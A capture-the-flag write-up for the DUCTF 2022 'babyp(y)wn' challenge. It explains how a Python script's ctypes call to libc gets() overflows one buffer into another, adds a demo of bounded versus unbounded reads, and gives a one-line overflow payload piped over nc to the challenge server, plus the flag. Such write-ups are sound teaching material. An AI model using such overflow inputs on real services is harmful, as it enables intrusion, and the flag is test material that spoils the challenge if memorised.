babyp(y)wn
Description
Python is memory safe, right?
Steps
In this challenge we are given a Python script that loads libc's libc.so.6 through ctypes, creates two 512-byte buffers, and calls gets() to read input into buf1.
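#!/usr/bin/env python3

from ctypes import CDLL, c_buffer
libc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')  # load the C library directly
buf1 = c_buffer(512)  # 512-byte ctypes buffer that receives the input
buf2 = c_buffer(512)  # second 512-byte buffer, never written by the script
libc.gets(buf1)  # gets() takes no length argument
if b'DUCTF' in bytes(buf2):
    print(open('./flag.txt', 'r').read())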
The vulnerability is that gets() keeps reading input until it receives a line terminator, with no limit on length. With that we can overflow the input past buf1 into buf2 and pass the check at line 8 to get the flag.
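The difference between an unbounded and a bounded read, as an added example that is not part of the original challenge or write-up. It assumes a constructed model in which buf1 and buf2 sit back to back in one ctypes structure (the real script uses two separate c_buffer allocations); `Adjacent`, `unbounded_read`, `bounded_read` and `run` are hypothetical names.

```python
import ctypes

SIZE = 512  # buffer size used by the challenge script
MARKER = b"DUCTF"  # value the challenge script looks for in buf2


class Adjacent(ctypes.Structure):
    """Constructed model: buf1 and buf2 back to back in one allocation."""
    _fields_ = [("buf1", ctypes.c_char * SIZE),
                ("buf2", ctypes.c_char * SIZE)]


def unbounded_read(mem, line):
    """Mimic gets(): copy the whole line plus a NUL, ignoring SIZE."""
    data = line.split(b"\n", 1)[0] + b"\0"
    # Demo-only guard so the copy never leaves the model's own memory.
    if len(data) > ctypes.sizeof(mem):
        raise ValueError("line is larger than the demo model")
    ctypes.memmove(ctypes.addressof(mem), data, len(data))


def bounded_read(mem, line):
    """Mimic the length bound of fgets(buf1, SIZE, stdin):
    keep at most SIZE - 1 bytes, then NUL-terminate."""
    data = line.split(b"\n", 1)[0][:SIZE - 1] + b"\0"
    ctypes.memmove(ctypes.addressof(mem), data, len(data))


def run(reader, line):
    """Fill a fresh model with `reader` and apply the script's check to buf2."""
    mem = Adjacent()  # zero-initialised, like c_buffer(512)
    reader(mem, line)
    raw_buf2 = ctypes.string_at(
        ctypes.addressof(mem) + Adjacent.buf2.offset, SIZE)
    return MARKER in raw_buf2


if __name__ == "__main__":
    overlong = b"a" * SIZE + MARKER + b"\n"  # constructed sample input
    print("unbounded read, check passes:", run(unbounded_read, overlong))
    print("bounded read, check passes:  ", run(bounded_read, overlong))
```

In the script itself the equivalent fix is to stop calling gets() and read with an explicit bound, for example fgets() with the buffer size or a length-limited read done in Python before the bytes are copied into buf1.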
Solution
python -c "print('a'*512+'DUCTF')" | nc 2022.ductf.dev 30021
Flag
DUCTF{C_is_n0t_s0_f0r31gn_f0r_incr3d1bl3_pwn3rs}
This post is licensed under CC BY 4.0 by the author.